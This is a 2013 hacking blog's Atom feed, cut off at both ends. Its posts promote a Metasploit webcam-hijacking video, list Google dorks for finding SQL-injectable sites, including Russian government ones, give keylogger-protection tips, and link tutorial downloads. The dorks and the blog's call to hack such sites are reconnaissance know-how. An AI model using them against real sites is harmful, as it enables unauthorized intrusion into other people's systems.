href=&quot;http://2.bp.blogspot.com/-MNYr9Przbpc/UUxcaRaUbAI/AAAAAAAAAGM/oHKWi9aavvE/s1600/piraterwebcam5.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;240&quot; src=&quot;http://2.bp.blogspot.com/-MNYr9Przbpc/UUxcaRaUbAI/AAAAAAAAAGM/oHKWi9aavvE/s320/piraterwebcam5.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;Well here is the superb demo by &quot;Aitzaz Mohsin&quot; which will show you how to hack victim&#39;s web cam&#39;s live streaming (Using Metasploit)&amp;nbsp; it will help you alot so here is the video enjoy it ;)&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;object class=&quot;BLOGGER-youtube-video&quot; classid=&quot;clsid:D27CDB6E-AE6D-11cf-96B8-444553540000&quot; codebase=&quot;http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0&quot; data-thumbnail-src=&quot;http://img.youtube.com/vi/17RXTGacKes/0.jpg&quot; height=&quot;266&quot; width=&quot;320&quot;&gt;&lt;param name=&quot;movie&quot; value=&quot;http://youtube.googleapis.com/v/17RXTGacKes&amp;source=uds&quot; /&gt;&lt;param name=&quot;bgcolor&quot; value=&quot;#FFFFFF&quot; /&gt;&lt;param name=&quot;allowFullScreen&quot; value=&quot;true&quot; /&gt;&lt;embed width=&quot;320&quot; height=&quot;266&quot;  src=&quot;http://youtube.googleapis.com/v/17RXTGacKes&amp;source=uds&quot; type=&quot;application/x-shockwave-flash&quot; allowfullscreen=&quot;true&quot;&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;(This video won&#39;t show you that how to hack victim&#39;s computer, This demo is based on after compromising with victim&#39;s computer ;) )&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;h2 style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: lime;&quot;&gt;IF Video Not Playing:&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/h2&gt;&lt;h2 style=&quot;text-align: center;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: lime;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/h2&gt;&lt;h2 style=&quot;text-align: center;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: lime;&quot;&gt;&amp;nbsp;&lt;a href=&quot;http://adf.ly/L2Jts&quot; target=&quot;_blank&quot;&gt;Click Here&lt;/a&gt;&amp;nbsp;&lt;/span&gt; &lt;/b&gt;&lt;/span&gt;&lt;/h2&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.blackleets.net/feeds/6816319817384095066/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blackleets.net/2013/03/hacking-victims-web-cam-video-demo-by.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3130564110394933894/posts/default/6816319817384095066'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3130564110394933894/posts/default/6816319817384095066'/><link rel='alternate' type='text/html' href='http://www.blackleets.net/2013/03/hacking-victims-web-cam-video-demo-by.html' title='Hacking Victim&#39;s Web Cam (Video Demo by S.O.G)'/><author><name>Blackleets</name><uri>http://www.blogger.com/profile/16410994504914391957</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://3.bp.blogspot.com/-dftCJdDmq4Y/UU3RmxS0HMI/AAAAAAAAAHE/kdCiuRew9IE/s220/images.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-MNYr9Przbpc/UUxcaRaUbAI/AAAAAAAAAGM/oHKWi9aavvE/s72-c/piraterwebcam5.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3130564110394933894.post-4961634935222773441</id><published>2013-03-17T10:35:00.001+05:00</published><updated>2013-03-22T18:30:03.267+05:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Dorks"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="web hacking"/><title type='text'>Find vulnerable sites like professionals (Dorks)</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://3.bp.blogspot.com/-c8qzCj84u70/UUxc0n7ippI/AAAAAAAAAGU/dOHA0le2m2g/s1600/google.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://3.bp.blogspot.com/-c8qzCj84u70/UUxc0n7ippI/AAAAAAAAAGU/dOHA0le2m2g/s1600/google.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;Well This is Just short article about google dorks which tells you that how to find vulnerable site of specific country, not only vulnerable but government and high profiles sites. this is not written by me but provided by my friend i don&#39;t know the author of this tutorial but whoever is writer the credit totally goes to him.&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;List of Dorks!&lt;br /&gt;&lt;br /&gt;[*] Finding Vuln SQLI sites via country code:&lt;br /&gt;&lt;br /&gt;CODE:&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;inurl:*.php?id= site:RU&lt;/b&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;br /&gt;This will search for Russian sites with the site: dork and look for pages with ANYTHING.php?id=&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;[*] Targeting Specific Sites:&lt;br /&gt;&lt;br /&gt;CODE:&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;blockquote&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;inurl:**.php?id= site:www.target.com&lt;/b&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;br /&gt;This helps decrease the time it takes to find a vuln rather than looking manually through the whole site.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;[*] The BIG stuff:&lt;br /&gt;&lt;br /&gt;CODE:&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;.gov inurl:**.php?id= site:RU&lt;/b&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;br /&gt;As you may have guessed, yes this will look for Russian Government sites with ANYTHING.php?id= in the URL. Dont forget you can change **.php?id= to any of your favorite dorks like **.php?catid= etc..&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;[0x03] Conclusion:&lt;br /&gt;Yes this was short and sweet but very helpful for beginners and those who are looking for new sites to hack. Get creative with your dorks. EX:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;CODE:&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;blockquote&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;intitle:Satellite Operations inurl:**.php?id= site:.gov.ru&lt;/b&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;br /&gt;Might Get a hit on a high profile site, use your imagination&lt;br /&gt;&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.blackleets.net/feeds/4961634935222773441/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blackleets.net/2013/03/find-vulnerable-sites-like.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3130564110394933894/posts/default/4961634935222773441'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3130564110394933894/posts/default/4961634935222773441'/><link rel='alternate' type='text/html' href='http://www.blackleets.net/2013/03/find-vulnerable-sites-like.html' title='Find vulnerable sites like professionals (Dorks)'/><author><name>Blackleets</name><uri>http://www.blogger.com/profile/16410994504914391957</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://3.bp.blogspot.com/-dftCJdDmq4Y/UU3RmxS0HMI/AAAAAAAAAHE/kdCiuRew9IE/s220/images.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-c8qzCj84u70/UUxc0n7ippI/AAAAAAAAAGU/dOHA0le2m2g/s72-c/google.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3130564110394933894.post-5911854130534113484</id><published>2013-03-14T23:21:00.000+05:00</published><updated>2013-03-14T23:21:04.471+05:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="security"/><title type='text'>3 Tips for Protection Against Keyloggers </title><content type='html'>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://i.imgur.com/4Znsmmn.png?1?2036&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://i.imgur.com/4Znsmmn.png?1?2036&quot; height=&quot;261&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;  Here are the tips and tricks to protect yourself from the&amp;nbsp;keyloggers&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Enable Your Firewall:-&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;Firewalls&amp;nbsp;don&#39;t&amp;nbsp;stop the keyloggers from entering into your PC But hey can help in stopping the keyloggers from sending your information.It is always recommended that you install a good firewall software to protect your computer from unauthorized access.By default Microsoft windows firewall is enabled.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Use Good Antivirus Software And Avoid Downloading cracked&amp;nbsp;Software&#39;s:-&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;Use good antivirus&amp;nbsp;software&#39;s&amp;nbsp;like Norton,&amp;nbsp;McAfee&amp;nbsp;or use the free ones like Avg,Avast,&amp;nbsp;Avira. They&amp;nbsp;certainly provide a lot of protection against&amp;nbsp;keylogger. Using&amp;nbsp;a special&amp;nbsp;Anti spyware&amp;nbsp;program also helps.And avoid downloading&amp;nbsp;software&#39;s&amp;nbsp;which have been cracked.Also avoid using torrents as much as you can because torrents is the hub of viruses and home of hackers.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Now Will Discuss ,&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;h2&gt;&lt;i&gt;How to Fool Keyloggers:&lt;/i&gt;&lt;/h2&gt;&lt;br /&gt;&lt;br /&gt;If you believe that their is a keylogger in your system then you can do the following things to protect yourself&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;i&gt;1)&lt;/i&gt;&lt;/span&gt; Instead of typing your username and password using your keyboard type it using On Screen Keyboard.On Windows Platform it can be opened By typing&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&amp;nbsp; &lt;b&gt;&lt;span style=&quot;color: #cc0000;&quot;&gt;osk&lt;/span&gt;&lt;/b&gt;&amp;nbsp; &amp;nbsp; in Run.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;i&gt;2)&lt;/i&gt;&lt;/span&gt;Type 2-3  random characters in your password field and then select it using your mouse,Now type your real password.This will add the random characters in front of the password recorded by keylogger and the keylogger is fooled by you for sending wrong password.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;i&gt;3)&amp;nbsp;&lt;/i&gt;&lt;/span&gt;Keylogger runs in the background.Always check out for suspicious processes using task manger and end them.&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;This tips and tricks will help you out in protecting yourself from these harmful spywares &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Regards,&lt;/div&gt;&lt;div&gt;&lt;a href=&quot;http://www.h4ck3rcracks.com/&quot; target=&quot;_blank&quot;&gt;Zulqurnain jutt&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.blackleets.net/feeds/5911854130534113484/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blackleets.net/2013/03/3-tips-for-protection-against-keyloggers.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3130564110394933894/posts/default/5911854130534113484'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3130564110394933894/posts/default/5911854130534113484'/><link rel='alternate' type='text/html' href='http://www.blackleets.net/2013/03/3-tips-for-protection-against-keyloggers.html' title='3 Tips for Protection Against Keyloggers '/><author><name>Zulqurnain jutt</name><uri>https://plus.google.com/116951957916407570833</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-HSAoE5GzcBw/AAAAAAAAAAI/AAAAAAAAAmc/bSI9couD7ho/s512-c/photo.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3130564110394933894.post-3194565646239477713</id><published>2013-03-10T15:31:00.001+05:00</published><updated>2013-03-23T13:43:27.702+05:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="download collection"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="Network Hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="penetration testing"/><category scheme="http://www.blogger.com/atom/ns#" term="Pentesting"/><category scheme="http://www.blogger.com/atom/ns#" term="security"/><title type='text'>1000 best Hacking/Security Tutorials Collection</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://3.bp.blogspot.com/-fjULcLSdOso/UUxdU4erWSI/AAAAAAAAAGc/VpAIVbUygEM/s1600/hacking.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;209&quot; src=&quot;http://3.bp.blogspot.com/-fjULcLSdOso/UUxdU4erWSI/AAAAAAAAAGc/VpAIVbUygEM/s320/hacking.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;Hello guys today am going to share a .rar file which contains 1000 tutorials in it. Regarding hacking, security , networking and other computer tricks.Some of you might have this file already because it&#39;s not actually collected by me but I got this file from my friend long time ago. And today am sharing this with you i hope you guys will like this. Here is the link below to direct download from Mediafire:&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;h2 style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;color: red; font-size: x-large;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: lime;&quot;&gt;Direct Link To Download:&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/h2&gt;&lt;h2 style=&quot;text-align: center;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: lime;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/h2&gt;&lt;h2 style=&quot;text-align: center;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: lime; font-size: x-large;&quot;&gt;&lt;a href=&quot;http://adf.ly/KadE2&quot; target=&quot;_blank&quot;&gt;Click Here&lt;/a&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/h2&gt;&lt;h2 style=&quot;text-align: center;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: lime; font-size: x-large;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/h2&gt;&lt;h2 style=&quot;text-align: center;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: lime; font-size: x-large;&quot;&gt;&amp;nbsp;&lt;/span&gt; &lt;/b&gt;&lt;/span&gt;&lt;/h2&gt;&lt;h2 style=&quot;text-align: center;&quot;&gt;&lt;/h2&gt;  &lt;!-- Begin BidVertiser code --&gt;&lt;SCRIPT LANGUAGE=&quot;JavaScript1.1&quot; SRC=&quot;http://bdv.bidvertiser.com/BidVertiser.dbm?pid=521758&amp;bid=1301130&quot; type=&quot;text/javascript&quot;&gt;&lt;/SCRIPT&gt;&lt;noscript&gt;&lt;a href=&quot;http://www.bidvertiser.com/bdv/BidVertiser/bdv_publisher_toolbar_creator.dbm&quot;&gt;toolbar maker&lt;/a&gt;&lt;/noscript&gt;&lt;!-- End BidVertiser code --&gt;   &lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;I Hope you guys will like this Regards Ment@l Mind&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.blackleets.net/feeds/3194565646239477713/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blackleets.net/2013/03/1000-best-hackingsecurity-tutorials.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3130564110394933894/posts/default/3194565646239477713'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3130564110394933894/posts/default/3194565646239477713'/><link rel='alternate' type='text/html' href='http://www.blackleets.net/2013/03/1000-best-hackingsecurity-tutorials.html' title='1000 best Hacking/Security Tutorials Collection'/><author><name>Blackleets</name><uri>http://www.blogger.com/profile/16410994504914391957</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://3.bp.blogspot.com/-dftCJdDmq4Y/UU3RmxS0HMI/AAAAAAAAAHE/kdCiuRew9IE/s220/images.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-fjULcLSdOso/UUxdU4erWSI/AAAAAAAAAGc/VpAIVbUygEM/s72-c/hacking.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3130564110394933894.post-724343952546358376</id><published>2013-03-03T12:22:00.000+05:00</published><updated>2013-03-22T18:32:34.989+05:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="google hack"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="Network Hacking"/><title type='text'>Google hacks Video Tutorial</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-c8qzCj84u70/UUxc0n7ippI/AAAAAAAAAGY/_HUAeip11Tk/s1600/google.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://2.bp.blogspot.com/-c8qzCj84u70/UUxc0n7ippI/AAAAAAAAAGY/_HUAeip11Tk/s1600/google.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span style=&quot;font-weight: normal;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;Google Hacks is a tool , so this is basically just a tutorial by &quot;JohnnyFartyPants&quot; which will demonstrate the features of the tool and tell you how to use. You can do many things using this tools and also can make your own google dorks, not only dorks but can take advantage of google search&lt;/b&gt; &lt;b&gt;engine to extract many personal data and files. So let me me give you the direct link to video and software to download&lt;/b&gt; &lt;b&gt;from&lt;/b&gt; &lt;b&gt;mediafire&lt;/b&gt;:&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;h4 style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;/h4&gt;&lt;h2 style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;span style=&quot;background-color: lime;&quot;&gt;Download Link For Video:&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/h2&gt;&lt;h2 style=&quot;text-align: center;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;span style=&quot;background-color: lime;&quot;&gt;&lt;span style=&quot;background-color: white;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span style=&quot;background-color: lime;&quot;&gt;&lt;/span&gt; &lt;/b&gt;&lt;/span&gt;&lt;/h2&gt;&lt;br /&gt;&lt;h2 style=&quot;text-align: center;&quot;&gt;&amp;nbsp;&lt;a href=&quot;http://adf.ly/KANK3&quot; target=&quot;_blank&quot;&gt;Click Here&lt;/a&gt;&lt;/h2&gt;&lt;h2 style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;span style=&quot;background-color: lime;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h2&gt;&lt;h2 style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;span style=&quot;background-color: lime;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h2&gt;&lt;h2 style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;span style=&quot;background-color: lime;&quot;&gt;Download Link For Tool:&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: lime;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h2&gt;&lt;h2 style=&quot;text-align: center;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;span style=&quot;background-color: lime;&quot;&gt;&lt;span style=&quot;background-color: white;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span style=&quot;background-color: lime;&quot;&gt;&lt;/span&gt; &lt;/b&gt;&lt;/span&gt;&amp;nbsp;&lt;/h2&gt;&lt;h2 style=&quot;text-align: center;&quot;&gt;&amp;nbsp;&lt;/h2&gt;&lt;h2 style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;http://adf.ly/KAMju&quot; target=&quot;_blank&quot;&gt;Click Here&lt;/a&gt;&lt;/h2&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.blackleets.net/feeds/724343952546358376/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blackleets.net/2013/03/google-hacks-video-tutorial.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3130564110394933894/posts/default/724343952546358376'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3130564110394933894/posts/default/724343952546358376'/><link rel='alternate' type='text/html' href='http://www.blackleets.net/2013/03/google-hacks-video-tutorial.html' title='Google hacks Video Tutorial'/><author><name>Blackleets</name><uri>http://www.blogger.com/profile/16410994504914391957</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://3.bp.blogspot.com/-dftCJdDmq4Y/UU3RmxS0HMI/AAAAAAAAAHE/kdCiuRew9IE/s220/images.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-c8qzCj84u70/UUxc0n7ippI/AAAAAAAAAGY/_HUAeip11Tk/s72-c/google.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3130564110394933894.post-3966268728987847265</id><published>2013-03-01T19:54:00.001+05:00</published><updated>2013-03-22T18:33:03.908+05:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="web application hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="web application security"/><category scheme="http://www.blogger.com/atom/ns#" term="web hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="Web Penetration testing"/><category scheme="http://www.blogger.com/atom/ns#" term="Web Pentesting"/><title type='text'>SQL Injection hacking and pereventing video demo by Lee j Lawson</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://4.bp.blogspot.com/-mI0HNw_L4-k/UUxbwHVXfnI/AAAAAAAAAGI/ESaorWL4ABY/s1600/sql_img.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://4.bp.blogspot.com/-mI0HNw_L4-k/UUxbwHVXfnI/AAAAAAAAAGI/ESaorWL4ABY/s1600/sql_img.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;As you already know that SQL Injection is very dan&lt;/b&gt;&lt;/span&gt;&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;gerous vulnerability and it&#39;s on top position in OWASP top 10 , here is very great video by Lee j Lawson (Penteration Tester) which will demostrate about the sql injection and will tell you how it can be harmfull using different SQL queries so here is the link below to direct download from mediafire:&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;h2 style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;span style=&quot;color: lime;&quot;&gt;Direct download Click the link below:&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/h2&gt;&lt;h2 style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;span style=&quot;color: lime;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/h2&gt;&lt;h2 style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;http://adf.ly/K3A7r&quot; target=&quot;_blank&quot;&gt;Click Here&lt;/a&gt;&lt;/h2&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.blackleets.net/feeds/3966268728987847265/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blackleets.net/2013/03/sql-injection-hacking-and-pereventing.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3130564110394933894/posts/default/3966268728987847265'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3130564110394933894/posts/default/3966268728987847265'/><link rel='alternate' type='text/html' href='http://www.blackleets.net/2013/03/sql-injection-hacking-and-pereventing.html' title='SQL Injection hacking and pereventing video demo by Lee j Lawson'/><author><name>Blackleets</name><uri>http://www.blogger.com/profile/16410994504914391957</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://3.bp.blogspot.com/-dftCJdDmq4Y/UU3RmxS0HMI/AAAAAAAAAHE/kdCiuRew9IE/s220/images.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-mI0HNw_L4-k/UUxbwHVXfnI/AAAAAAAAAGI/ESaorWL4ABY/s72-c/sql_img.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3130564110394933894.post-6448201152684753502</id><published>2013-03-01T13:06:00.002+05:00</published><updated>2013-03-22T18:34:49.469+05:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="Network Hacking"/><category scheme="http://www.blogger.com/atom/ns#" 